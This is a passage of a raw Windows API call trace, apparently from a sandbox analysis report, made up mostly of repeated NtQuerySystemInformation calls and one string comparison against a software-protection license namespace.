ResultLength=0x0) [0285.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d700, Length=0x28, ResultLength=0x0) [0285.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d780, Length=0x28, ResultLength=0x0) [0285.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d780, Length=0x28, ResultLength=0x0) [0285.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d620, Length=0x20, ResultLength=0x0) [0285.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d6e0, Length=0x20, ResultLength=0x0) [0285.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d670, Length=0x20, ResultLength=0x0) [0285.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d670, Length=0x20, ResultLength=0x0) [0285.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d950, Length=0x28, ResultLength=0x0) [0285.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d950, Length=0x28, ResultLength=0x0) [0285.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x28, ResultLength=0x0) [0285.513] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0285.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.520] NtQuerySystemInformation 